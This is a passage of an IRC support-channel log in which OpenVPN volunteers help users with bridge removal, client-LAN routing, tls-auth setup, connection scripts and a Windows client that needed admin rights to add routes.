< WDKevin> ill give it a try. if it messes up ill finish when i get home 13:58 < WDKevin> how do i remove the bridge? 13:58 < WDKevin> i have assigned eth0 with a static ip in interfaces, but its not seeming to take affect 13:58 < WDKevin> i must be missing something 13:58 <+pekster> Becuase the bridge has the same IP. In Linux, bridge members never hold the IP, the bridge interface does 13:59 < WDKevin> but i removed the bridge from interfaces 13:59 <@dazo> WDKevin: if you have a openvpn config which connects well (meaning the --remote, --key/--cert/--ca etc options working kind of) ... the look at the "Using Routing" section in the URL above 13:59 <+pekster> 'brctl show' will show you your bridge status now 13:59 <@dazo> and if both br0 and eth0 share an IP address ... that won't route well 13:59 < WDKevin> it shows it on eth0 13:59 <+pekster> If eth0 is in br0, remove it first via 'brctl delif br0 eth0' and then you can remove the bridge with 'brctl delbr br0' 13:59 < WDKevin> ok 14:00 <+pekster> Again, if br0 is in use now, that may cause you connectivity issues 14:00 < WDKevin> ill give it a shot 14:00 < hg_5> hi pekster, can you check if this config is proper on my openvpn server http://pastebin.com/MpQW0nmk 14:00 < WDKevin> if it messes up ill do it when iget home 14:00 < WDKevin> ill email myself the commands you just gave me 14:01 < WDKevin> yep, that broke it 14:03 <+pekster> hg_5: It's technically a "valid" configuration, although no clue why you're explicitly declaring tun21 (openvpn usually creates a device dynamically when you bring it up.) Further, 'daemon' is usually specified by init scripts, not config files, but it's not "wrong" to do that if you want 14:03 <@dazo> on some router firmwares, you do need --daemon explicitly 14:04 <+pekster> Well, I'm guessing by the "automatically geneated configuration" that some Web GUI frontend thing made that file 14:04 < hg_5> and my ccd file: client10 14:04 < hg_5> iroute 192.168.7.0 255.255.255.0 14:04 <+pekster> No idea how it interacts with the init system to get tun21, but I'll happily ignore that unless errors show it's a problem 14:05 < hg_5> pekster where can i find automatical configuration? 14:05 <@dazo> there's no such thing :) 14:05 <+pekster> Sure, so client10 "owns" that network. That matches with your server config options 14:05 <+pekster> It's a valid configuration, assuming it starts properly and works with the OS's init scripts 14:07 < hg_5> yes client10 owns this network 14:07 <+pekster> Although, no real point in pushing the route to 192.168.7/24 since you redirect-gateway anyway, but you might as well leave that in if you decide to undo that (and it'll likely annoy your autoconfig voodoo if you tinker with it.) I can't help with the frontend, just the config and any errors you get. The rest is an excersize for the reader ;) 14:08 <+pekster> (doing both won't hurt anything) 14:08 < hg_5> pekster so... it will be enough if i will just add client10 ccd file? (instead of making push route to 192.168.7.x) ? 14:08 <+pekster> Yes. But you need that push for the route if you ever *remove* the redirect-gateway push 14:08 <+pekster> (otherwise other clients can't reach that network) 14:09 <+pekster> For a detailed flowchart on how client-lan connectivity works, see: 14:09 <+pekster> !clientlan 14:09 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route 14:09 <@vpnHelper> for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png 14:09 <+pekster> That shows you each step that is required. Assuming your firewalls and routing is enabled properly on that unit, you should have all the config steps met already with that setup 14:09 -!- MeanderingCode_ [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 14:10 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 244 seconds] 14:11 < hg_5> hm pekster i have to do that http://puu.sh/1YsJE in server and client ? 14:11 <+pekster> That's thet push for 192.168.7.0/24, so yes you already have it 14:12 -!- pa__ [~pa@host55-12-dynamic.61-82-r.retail.telecomitalia.it] has quit [Quit: Sto andando via] 14:12 <+pekster> The 'route' command tells the OS to let the openvpn server "be responsible" for that route (so you need that always when a client LAN has that range you wish to connect/route to) 14:12 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 14:12 <+pekster> The 'push' for that route lets *other* VPN clients connect to it 14:15 <+pekster> hg_5: Are you having problems with that config? Does the server start cleanly without errors? (remember, it'll send logs to the system logger in your setup) 14:15 -!- MeanderingCode_ [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Read error: Connection reset by peer] 14:16 < hg_5> pekster wait i have to reset router and i will check, because before i have this route push but didnt have ccd in jffs so it dissapered after reboot 14:17 <+pekster> There should be a way to start or restart the VPN through an init system, but since that doesn't look like openwrt I can't really help (and I actually hate openwrt's stock openvpn support anyway too, but I digress) 14:17 <+pekster> Maybe look in /etc/init.d or see your platform's documentation on the preferred way to restart it 14:18 <+pekster> (or yea, reboot ;) 14:21 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 14:26 -!- niervol [~krystian@193.106.244.150] has quit [Remote host closed the connection] 14:35 -!- dazo is now known as dazo_afk 14:42 -!- Valcorb [~Valcorb@84.198.139.192] has quit [] 14:42 < hg_5> pekster still it doesnt work with this config 14:42 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 14:44 <+pekster> "doesn't work" isn't very descriptive. Logs at 'verb 4' and a description of what's not working would be better 14:44 -!- novaflash is now known as novaflash_away 14:45 < hg_5> pekster ok wait 14:46 -!- novaflash_away is now known as novaflash 14:48 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 14:48 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 14:50 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Client Quit] 14:50 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 14:51 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Client Quit] 14:51 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 244 seconds] 14:51 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 14:51 -!- Orbi [~opera@anon-149-235.vpn.ipredator.se] has quit [Ping timeout: 272 seconds] 14:54 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Client Quit] 14:55 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 14:56 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 14:58 -!- neilhwatson [~neil@cl-274.chi-03.us.sixxs.net] has joined #openvpn 15:02 < hg_5> hmm pekster it still doesn't work, i cant ping from router 192.168.7.x subnet , http://puu.sh/1Yufn 15:02 < hg_5> my router now has this in routing, but still doesnt work 15:06 <+pekster> That's one part of the process 15:07 <+pekster> Follow the flowchart for the !clientlan output as it will lead you to the exact component that's wrong 15:08 <+pekster> Obviously, your client needs to be connected too (the one that owns that netwowrk) and its firewall needs to permit the traffic 15:15 < hg_5> my client router has its local ip 192.168.7.7 , and i even can't ping it 15:18 <+pekster> That's not the first thing you're supposed to be doing according to the flowchart 15:18 <+pekster> I can't help if you can't follow directions 15:19 <+pekster> If you have that problem at the correct point on the flowchart, you will discover the fix to that problem 15:20 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Read error: Operation timed out] 15:22 -!- neilhwatson [~neil@cl-274.chi-03.us.sixxs.net] has quit [Quit: Leaving.] 15:40 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 15:40 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 15:40 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 15:40 -!- mode/#openvpn [+o krzee] by ChanServ 15:40 <@krzee> https://community.openvpn.net/openvpn/wiki/IOSinline 15:40 <@vpnHelper> Title: IOSinline – OpenVPN Community (at community.openvpn.net) 15:41 <@krzee> !ios 15:41 <@krzee> !iphone 15:41 <@vpnHelper> "iphone" is (#1) http://www.zdnet.com/blog/hardware/ubuntu-lucid-lynx-1004-can-read-your-iphones-secrets/8424 <-- be aware of that before putting your keys on an iphone or (#2) OpenVPN is now available for iOS in the App Store 15:42 <@krzee> !learn iphone as https://community.openvpn.net/openvpn/wiki/IOSinline 15:42 <@vpnHelper> Joo got it. 15:42 <@krzee> !learn inline as https://community.openvpn.net/openvpn/wiki/IOSinline for a writeup that includes how to use inline certs 15:42 <@vpnHelper> Joo got it. 15:43 <+pekster> That article doesn't explain how if the encryption is "PIN-based" how one can mount up the volume without first decrypting it 15:45 <+pekster> Sounds like it's either not actually encrypted, or decrypted at runtime and exposed through a fairly easy-to-exploit overflow execution. Good thing the source was closed so no one could discover the attack vector ;) 15:46 <@krzee> #1 above? 15:47 <@krzee> no exploit involved 15:47 <+pekster> Yea, I'm reading the linked article with more details now 15:47 <@krzee> hopefully not the same in current ios, but i wouldnt know 15:47 <+pekster> It still doesn't bode well for the security model that it was compromised like that 15:48 <+pekster> If we haven't learned already from Java/Flash, another "OS update" doesn't protect you like a magic ward 15:48 <@krzee> even if updated, with it being closed source and this existed before, ild highly doubt they actually made it secure 15:50 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 15:52 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 15:54 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 15:57 <+pekster> krzee: Also concerning is that it took Apple 3 months from the time that article was published to the time they realised an iOS fix for it 15:57 <+pekster> No clue if they had notice before that publish date too (making it >3mo) 15:58 <@krzee> and nobody was even testing to make that article, they just happened to notice 15:59 <@krzee> plugged their phone into ubuntu and went "hey look!" 15:59 <+pekster> Right :) 15:59 <+pekster> But if you're a Good Apple Employee what would you be doing with Ubuntu ;) 15:59 <@krzee> they have oldschool unix guys there 15:59 <@krzee> then again, they wouldnt be using ubnuntu 16:00 <@krzee> lol 16:00 <@krzee> more like netbsd and friends 16:00 <@krzee> a friend of mine was one of their solaris admins 16:00 <+pekster> NetBSD isn't bad if you need a Unix :) 16:02 <+pekster> copyleft doesn't inherently make it more secure, just more likely that flawsa re found when skilled people review it. Debian/SSL years back did highlight the importance of that 2nd part :) 16:03 < EugeneKay> Debian/SSL was a case of downstream "being smarter" than upstream 16:03 <+pekster> Right 16:13 -!- walp [~nobody@unaffiliated/walp] has joined #openvpn 16:14 < walp> quick question, if i already have a ssh port forward on a remote machine pointed to a proto tcp vpn endpoint (server), could i point the --remote in the client to a local ssh port forward (socks5) ? 16:14 <@krzee> yes, see socks options in the manual 16:14 <@krzee> !man 16:14 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend! 16:15 <@krzee> HOWEVER 16:15 <@krzee> this is a bad setup 16:15 <@krzee> !tcp 16:15 <@vpnHelper> "tcp" is (#1) Sometimes you cannot avoid tunneling over tcp, but if you can avoid it, DO. http://sites.inka.de/~bigred/devel/tcp-tcp.html Why TCP Over TCP Is A Bad Idea. or (#2) http://www.openvpn.net/papers/BLUG-talk/14.html for a presentation by James Yonan (OpenVPN lead developer) or (#3) if you must use tcp, you likely want --tcp-nodelay 16:15 <@krzee> you are basically ensuring a tcp-in-tcp setup, and if you're using tcp over the vpn it is tcp-in-tcp-in-tcp 16:15 <@krzee> just asking for meltdown 16:16 < walp> so, --socks-proxy 127.0.0.1:LOCAL_PORT 16:16 < walp> in client 16:16 -!- c3vin [~c3vin@70.62.198.163] has quit [Ping timeout: 240 seconds] 16:17 <@krzee> yep, but if it sucks you know why 16:17 < walp> ya 16:17 <@krzee> (it may start good and get progressively worse) 16:17 <@krzee> also, you could use a real socks server, that uses udp 16:17 <@krzee> like dante 16:17 < walp> could i not do udp-in-tcp-in-tcp 16:18 <@krzee> sure, but its still tcp in tcp 16:18 < walp> say proto udp in the client and server, tunneled over tcp socks5 16:18 <@krzee> no 16:18 <@krzee> but you can xfer udp over your tcp vpn which is over a tcp socks 16:18 <@krzee> but your tcp ssh socks can only connect to tcp 16:19 < walp> gotcha 16:19 <@krzee> a dante socks server can run on udp, and connect to udp 16:19 <@krzee> which would allow the vpn to be udp 16:19 -!- nickanderson is now known as nickanderson_afk 16:19 <+pekster> Why mess with proxies anyway? 16:19 <@krzee> oh wait no 16:19 <@krzee> dante would be on tcp 16:19 <@krzee> but then vpn could be on udp 16:19 <+pekster> If you can ssh in, you presumably have control over the system, the firewall, and the OS 16:19 <@krzee> ^^^ 16:19 <@krzee> best to lose the proxy if you can 16:20 < walp> as of right now, i have ovpn configured to run on 53/udp 16:20 < walp> because most networks will allow outgoing 53/udp requests, whether or not it's DNS traffic 16:20 < kisom> Not really 16:21 < kisom> Most restricted networks have a local DNS server 16:21 <+pekster> Some might, but many just redirect all outbound DNSN requests to their internal server if they're security concious 16:21 <+pekster> More strict places do DPI anyway 16:21 < walp> yeah 16:21 <+pekster> Nothing saves you from a (good) DPI box 16:21 <+pekster> Cell service maybe ;) 16:21 < kisom> pekster: Cell service saved you from nothing ;) 16:22 < walp> vpn over tor/proxychains over 4g lol 16:22 <@krzee> ild expect responsible admins to rate limit their 53 outbound if nothing else 16:23 < walp> i want to do a similar setup in a little while, the goal of which is to only allow vpn traffic to a git repository 16:23 < kisom> walp: port 80 and 443 is probably your best bet 16:23 < walp> yeah probably 443 would be better 16:23 < kisom> And yes, while a DPI can indeed block OpenVPN on those ports, they are just as likely to do so on 53/UDP 16:24 < walp> or 43/tcp :) 16:24 < kisom> I use TCP/3724 in china. The port used by world of warcraft. 16:24 < walp> ^ lol 16:24 <@krzee> lol nice 16:25 <@krzee> !inline 16:25 <@vpnHelper> "inline" is https://community.openvpn.net/openvpn/wiki/IOSinline for a writeup that includes how to use inline certs 16:26 <@krzee> !forget inline 16:26 <@vpnHelper> Joo got it. 16:26 <@krzee> !learn inline as Inline files supported since OpenVPN 2.1rc1 (pkcs12 since 2.2) and documented in the OpenVPN 2.3 man page (https://community.openvpn.net/openvpn/wiki/Openvpn23ManPage under INLINE FILE SUPPORT) 16:26 <@vpnHelper> Joo got it. 16:26 <@krzee> !learn inline as https://community.openvpn.net/openvpn/wiki/IOSinline for a writeup that includes how to use inline certs 16:26 <@vpnHelper> Joo got it. 16:26 < walp> lol 16:26 < walp> nice bot 16:26 <@krzee> thanks 16:26 <@krzee> !factoids 16:27 <@vpnHelper> "factoids" is A semi-regularly updated dump of factoids database is available at http://www.secure-computing.net/factoids.php 16:27 <@krzee> thats all he knows ^ 16:27 < walp> does tls-auth work only with UDP? 16:27 <@krzee> yes 16:27 <@plaisthos> krzee: you had to copy&paste my grammer error of a missing "are" :p 16:27 <@krzee> to my understanding at least 16:27 <@krzee> feel free to try it 16:27 <+pekster> huh? No, that works anywhere 16:27 <+pekster> It's HMAC on top of the TLS stream 16:27 <@krzee> plaisthos, works to me when i say it! 16:28 <@plaisthos> Yeah but Inline files /are/ supported since .... sounds better 16:28 <@krzee> hmm i seem to remember it being udp only, but i dont use tcp anywhere, nor have i ever 16:28 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:28 <@plaisthos> tls-auth works with tcp 16:28 <@krzee> plaisthos, feel free to edit if you like 16:29 <@plaisthos> krzee: !forget and !learn again? 16:29 <@krzee> yep, forget * 16:29 <@plaisthos> !forget inline * 16:29 <@vpnHelper> Joo got it. 16:29 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 256 seconds] 16:29 <+pekster> krzee: is bot access based on cloak, or manually edited? I had a few entries I couldn't fix up with outdated info 16:30 <@krzee> your cloak should give you access 16:30 <@plaisthos> !learn inline as Inline files (e.g. ... are supported since OpenVPN 2.1rc1 and documented in the OpenVPN 2.3 man page (https://community.openvpn.net/openvpn/wiki/Openvpn23ManPage under INLINE FILE SUPPORT) 16:30 <@vpnHelper> Joo got it. 16:30 < walp> ok so, openvpn --genkey --secret ta.key on both client and server, and --tls-server --tls-auth ta.key 0 for server, and --tls-client --tls-auth ta.key 1 for client? 16:30 <@krzee> so both =] 16:30 <@plaisthos> !learn inline as https://community.openvpn.net/openvpn/wiki/IOSinline for a writeup that includes how to use inline certs 16:30 <@vpnHelper> Joo got it. 16:30 <@krzee> (your new cloak) 16:30 <@plaisthos> !inline 16:30 <@vpnHelper> "inline" is (#1) Inline files (e.g. ... are supported since OpenVPN 2.1rc1 and documented in the OpenVPN 2.3 man page (https://community.openvpn.net/openvpn/wiki/Openvpn23ManPage under INLINE FILE SUPPORT) or (#2) https://community.openvpn.net/openvpn/wiki/IOSinline for a writeup that includes how to use inline certs 16:31 <+pekster> walp: Almost. You need the *same* key on both sides 16:31 < walp> err ya 16:31 <+pekster> So, you can't generate it on both ends since it's random 16:31 < walp> so gen on server 16:31 < walp> then scp to workstation 16:31 <+pekster> Yup. Every client needs the same key, used in the opposite direction (0 vs 1) than the server 16:31 <@krzee> gen whereever, make sure its the same on EVERY endpoint 16:32 < walp> coolies 16:32 <+pekster> It basically just prevents any peer without that key from even attempting an authentication (which eats up resources, even if they don't have a valid client cert or pass) 16:32 <@krzee> layer7 attack prevention 16:33 < walp> kinda like preventing a connection to IRC with SSL by only allowing certain SSL fingerprints 16:33 <@krzee> stops a slowloris from being made against openvpn 16:33 < EugeneKay> Before SSL even occurs 16:34 < walp> so before it blesses the existing socket with ssl, but after it's in an ESTABLISHED state 16:34 < EugeneKay> Yes, though UDP really doesn't establish 16:34 < walp> with proto tcp anyway 16:35 <@krzee> (hes using tcp) 16:35 < walp> but yeah UDP just before the lbess 16:35 < walp> *bless 16:39 < walp> ok now, is there a way to run a shell script that emails me whenever someone logs on to the vpn? 16:40 < kisom> Yes. 16:40 <@krzee> !script 16:40 <@vpnHelper> "script" is see http://openvpn.net/index.php/open-source/documentation/manuals/69-openvpn-21.html#lbAR for a list of places scripts can hook into openvpn 16:40 <@krzee> maybe youd like --client-connect 16:40 < walp> dood that's badass 16:40 < Devastator> is it correct to say that easy-rsa dir is a PKI? 16:40 < walp> openvpn is the shit 16:40 <@krzee> i agree, that scripting interface is GREAT 16:40 -!- vmachine2 [~PC@78-105-138-183.zone3.bethere.co.uk] has joined #openvpn 16:41 <@krzee> Devastator, basically. the pki is the crypto files in there 16:41 < kisom> I don't like the idea with dynamic configuration files 16:41 <@krzee> backing up the easy-rsa dir is backing up the pki 16:41 -!- vmachine2 [~PC@78-105-138-183.zone3.bethere.co.uk] has left #openvpn [] 16:41 < walp> are there scripting examples based on those hooks? 16:41 <@krzee> kisom, why not? 16:41 < kisom> I think openvpn should just read the scripts STDOUT and assume it is the config 16:41 < kisom> Because writing temporary files feels like a quickhack 16:41 <@krzee> kisom, it reads from the file you output to $1 iirc 16:42 < kisom> Yeah 16:42 <+pekster> walp: I've got a GPL foundation you can start with if you want some accounting stuff. It doesn't email you, but it should be trivial to send it somewhere other than a flat-file: 16:42 <+pekster> !accounting 16:42 <@vpnHelper> "accounting" is http://pekster.sdf.org/code/files/openvpn-user-accounting.tgz for some bash code for basic accounting 16:42 < kisom> That's not a good thing imo 16:42 <@krzee> pekster, nice! 16:43 < walp> ohhh it does an export ? 16:43 <@krzee> export? 16:43 <+pekster> It's just a bash scrpt to collect some env-vars that define the user on dissconnect and write stats 16:43 < walp> like, i could read it from $ENV{'trusted_ip'} with a perl script 16:44 <+pekster> Right 16:44 <@krzee> yep 16:44 <+pekster> That's basically what that script does, although that's on disconnect to collect stats about the session (connect/dissconnect time, bw transferred, IP used, etc) 16:44 < walp> pekster: are you single? :D 16:44 <@krzee> and the !script link in manual gives a bunch of inherited ENV vars 16:44 <@krzee> or you can dump the ENV 16:45 <@krzee> (from within the script_ 16:48 < Devastator> krzee great, I was just wondering that, because of the talk we had yesterday about securing the vpn... so if I put easy-rsa into a usb stick and use it to build-ca, build-key-server, I can use it to sign csr and/or generate client keys from within a live cd, correct? 16:48 < kisom> Devastator: That's correct. 16:49 < Devastator> ok, I understand the concept, time for more trials heheh 16:49 <+pekster> With an offline CA like that, normally you don't want to run the 'build-key-server' scripts, but generate the keypair (produces a private key and a CSR) and send the CSR to the offline signing host 16:49 < Devastator> I mean, I think I understand the concept, that is 16:49 <+pekster> IIRC, build-key-server is designed to both generate the request and sign it all at once 16:49 < walp> so the 'untrusted_ip' would still be available in --client-connect 16:50 <+pekster> walp: $trusted_ip should too 16:50 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 16:50 < walp> ah 16:51 <+pekster> Although they should both be the same :P 16:51 < Devastator> pekster pardon for the question, but how to generate a private key and a CSR? I'm getting used to the scripts 16:52 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 16:52 < kisom> Devastator: Just use the scripts, it does not matter in this case since you're your own CA. 16:52 < kisom> Devastator: The point with CSR is that you send your public key to someone else and they sign it, without knowing your private key. 16:53 < Devastator> kisom something like.. ./build-key server? 16:53 < walp> i'm guessing that any other exit code than 0 throws an error? 16:54 < kisom> Devastator: Yes 16:54 < kisom> walp: Any other exit code will deny access to the connecting client. 16:55 < walp> k 16:55 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 16:55 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 16:55 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 16:56 -!- mode/#openvpn [+o krzee] by ChanServ 17:01 < Devastator> hum.. things are getting clear.. vars script is to prepare the environment to generate cert/keys from what I understand.. 17:03 <@krzee> yep 17:03 <@krzee> thats why you source it 17:03 <@krzee> it loads the vars into memory for the next step(s) 17:03 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [] 17:05 -!- AsadH is now known as zz_AsadH 17:08 < Devastator> I will pastebin my steps in a few, to see if I understand everything I need to, and I didn't get to configuring routings etc for my needs yet heheh 17:08 <@krzee> you shouldnt get to routing yet 17:08 <@krzee> first get a vpn up 17:08 <@krzee> THEN build on that vpn 17:09 < Devastator> exactly, I plan to understand how to handle certs/keys first, then move to configuring it per se... 17:11 <+pekster> Well, you can always split your PKI out to an offline system later. easy-rsa used all on 1 host is easy. It may not be for the security-paranoid (raises hand) but it's quick and functional. Keys are still encrypted on-disk. The only real difference is that it's an online CA, and keys are stored in 1 place. 17:12 <+pekster> Paranoid is free. The vault and guards will, however, cost you. 17:12 <+pekster> Paranoia* 17:20 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 256 seconds] 17:25 < Devastator> pekster and a shotgun :) 17:26 <+pekster> !shotgun 17:26 <@vpnHelper> "shotgun" is (#1) the most effective form of physical security or (#2) shotgun security? If you try to physically attack my network, I chase you with a shotgun. 17:26 < Devastator> hahahahaha 17:26 < Devastator> I can't stop laughing 17:26 -!- b1rkh0ff [~b1rkh0ff@178.77.4.218] has quit [Ping timeout: 244 seconds] 17:29 -!- daemonoob [~rschultz@68-233-212-42.static-ip.telepacific.net] has quit [Quit: Leaving] 17:31 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 244 seconds] 17:34 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 264 seconds] 17:34 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 17:35 < walp> hmm that's weird 17:35 < walp> so i had proto tcp port 443 17:35 < walp> windows openvpn client wouldn't connect 17:35 < walp> changed it to 443/udp and it instantly connected 17:38 -!- b1rkh0ff [~b1rkh0ff@178.77.2.66] has joined #openvpn 17:47 <+pekster> connecting as a windows client to tcp/443 works fine. Could be firewalls or a proxy that didn't like it though 17:50 < walp> ok so i have connected with windows openvpn with tls-auth etc 17:50 < walp> i get an ip 17:50 < walp> but i can't ping the other endpoint 17:51 < walp> http://pastie.org/pastes/6083482/text?key=f8g2qdnnfhps2r89pgqsea 17:53 < walp> http://pastie.org/pastes/6083496/text?key=fasfjxaz39bvzyshrnzp7q client 17:54 <+pekster> It usually boils down to a firewall problem. Also, your setup will cause you problems unless you use 'persist-key' (unless the key is actually readable by your www-data user. That would likely be a security risk if you run other things as that user too) 17:54 < walp> no firewall on either device 17:54 <+pekster> See the '--user' description in the manpage for more details on potential issues when dropping user privs like that 17:54 < walp> yet 17:55 <+pekster> And you can't ping 10.20.0.1 from the client? 17:55 < walp> correct 17:56 <+pekster> client getting the interface set correctly? Logs at 'verb 4' would be helpful starting with the client, and I may need the server logs too 17:56 <+pekster> (I assume you've verified firewall status with 'iptables-save' on the server already? If not, drop that somewhere too) 17:57 < walp> iptables is clear 17:57 < walp> http://pastie.org/pastes/6083519/text?key=ws3xr7f9cidiska1asm7g client log 17:58 <+pekster> You have an error there. That's also not verb 4 17:59 <+pekster> The route failed to be added. Are you running as an admin? 17:59 < walp> i thought that the win32-tap service would be, and that you didn't have to run the openvpn gui client as admin 17:59 <+pekster> Oh, and it failed to handle the topology. You're using a 2.0.9 client? 17:59 <+pekster> That's really, REALLY old 17:59 <+pekster> !download 17:59 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all. It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only 17:59 <@vpnHelper> thing supported here) there is no separate download for client/server, it is the same install with different configs 17:59 <+pekster> Like, years old 17:59 < walp> *sigh* 17:59 <+pekster> Update your client. We're at 2.3.0 18:00 < walp> lol 18:00 -!- p0rk [~d0dger@pa-67-235-87-119.dhcp.embarqhsd.net] has joined #openvpn 18:00 < p0rk> fys, you here? 18:00 < walp> so the config is good 18:00 < walp> but my client is not 18:01 < p0rk> or anyone else who helped me (WDKevin) earlier today with my bridge issue 18:04 < walp> hmm okay 18:04 < walp> my client is updated 18:04 < walp> still getting same error 18:04 <+pekster> Logs with verb 4 this time 18:04 -!- p0rk [~d0dger@pa-67-235-87-119.dhcp.embarqhsd.net] has quit [Read error: Connection reset by peer] 18:04 <+pekster> All of it 18:04 < walp> aha 18:05 < walp> just had to run it as administrator 18:05 < walp> i can now ping 10.20.0.1 18:05 < walp> i guess it just didn't have permission to add the route to the virtual adapter? 18:05 <+pekster> Non-admins can't add routes on most OSes 18:05 <+pekster> (with some really technical exceptions that don't apply to you) 18:06 < walp> so, client-to-client in the server config will enable me to setup linux "client" (even though it's a server) 18:07 < walp> so that i can setup apache for instance, listening on the tunnel IP on the "client" linux server 18:07 <+pekster> No 18:07 -!- p0rk [~d0dger@pa-67-235-87-119.dhcp.embarqhsd.net] has joined #openvpn 18:07 <+pekster> !c2c 18:07 <@vpnHelper> "c2c" is "client-to-client" is with this option packets from 1 client to another are routed inside the server process. without it packets leave the server process, hit the kernel (firewall, routing table) and if allowed by firewall and routed back to server process, they go to the client. you use this option when you do not want to use selective firewall rules on what clients can access things 18:07 <@vpnHelper> behind other clients 18:08 < p0rk> pekster, it was you! 18:08 <+pekster> Generally, you never need c2c unless you're trying to avoid firewalling traffic between clients (a possible advantage if you don't want a stateful firewall keeping state on those connections) 18:08 < walp> well, okay maybe you can clarify.. what i want to do is setup apache to listen on 10.20.0.10 (for example) that only VPN clients can access 18:08 < p0rk> you were helping me with removing br0 and i tried it from work but it broke 18:08 < p0rk> im home now and finished removing it, im back to just eth0 on the correct ip, but i still cant connect 18:09 <+pekster> walp: Your best bet is to bind apache to the windcard interface (ie: 0.0.0.0:80 and 443 if you need) and firewall it. Most apps get angry if you rip out their socket from under them 18:10 <+pekster> Optionally you can bind to the VPN IP, but you need to code magic to get apache httpd to run when the VPN connects, and somehow gracefully handle tear-down. And your IP changes each time unless you do static addressing. It's non-trivial to do that 18:10 < walp> pekster: with client-config-dir ? 18:10 <+pekster> So you don't "really" want apache to listen on the VPN IP 18:10 < walp> and using static addressing per CN 18:10 <+pekster> Sure, a ccd file could get a static IP 18:11 <+pekster> You still are left with a mess to deal with binding httpd to an interface that goes down if you loose connectivity 18:11 < walp> that's fine 18:11 <+pekster> (or the VPN just needs a restart for whatever reason) 18:11 <+pekster> as in, it might actually crash httpd 18:11 <+pekster> YMMV 18:11 <+pekster> p0rk: All IP removed on br0? That bridge is gone, and you have the IP on eth0 only now? 18:11 < walp> that's fine too, i can just cron an external verification that apache is up with it listening on eth0 18:12 < p0rk> pekster, correct 18:12 < walp> if not, killall -9 openvpn httpd; sleep 3; /etc/init.d/openvpn start; sleep 5; /etc/init.d/httpd start 18:12 <+pekster> walp: Not really. It could be up on eth0 but not the VPN IP if you have different Listen directives 18:12 -!- p0rk [~d0dger@pa-67-235-87-119.dhcp.embarqhsd.net] has quit [Read error: Connection reset by peer] 18:13 <+pekster> So basically, don't bind to specific IPs like that unless you fully understand what you're doing 18:13 < walp> pekster: yeah everything about that apache is going to be manual config 18:13 -!- p0rk [~d0dger@pa-67-235-87-119.dhcp.embarqhsd.net] has joined #openvpn 18:13 <+pekster> Use a firewall for controlling access, like you should 18:13 < walp> if apache at all, might do nginx 18:13 < walp> i hate binding to wildcard 18:13 <+pekster> Okay... 18:14 * pekster shrugs. No idea how you want to handle restarting the vhost or HUPing the service when the VPN comes up, but you can script all that magic in an --up or --route-up script I suppose 18:14 <+pekster> It's a bad solution IMO, but it's there for you to play with 18:14 < walp> just call /usr/local/sbin/nginx -s reload on --up 18:14 < walp> i guess 18:15 < walp> ill figure out a way 18:16 <+pekster> p0rk: netstat -nlp | grep openvpn shows it on the port you expect? 18:16 -!- WDKevin [~WDKevin@173-163-136-177-centralpennsylvania.hfc.comcastbusiness.net] has quit [Ping timeout: 272 seconds] 18:22 < p0rk> im sorry, i had to get the stove fired up 18:23 < p0rk> it shows port 1194 18:23 < p0rk> which is correct 18:23 < p0rk> however 18:23 < p0rk> when i nmap my domain, i do not see that port 18:26 <+pekster> You may not see replies for UDP ports, depending on how evyerything is configured 18:26 <+pekster> UDP or TCP? 18:26 < p0rk> ah 18:26 < p0rk> in my router i have both set 18:26 <+pekster> No, what is ovpn running as? 18:26 < p0rk> i have dd-wrt, has a drop down for udp, tcp and both 18:26 < p0rk> oh 18:26 <+pekster> The router only needs the one you're actually 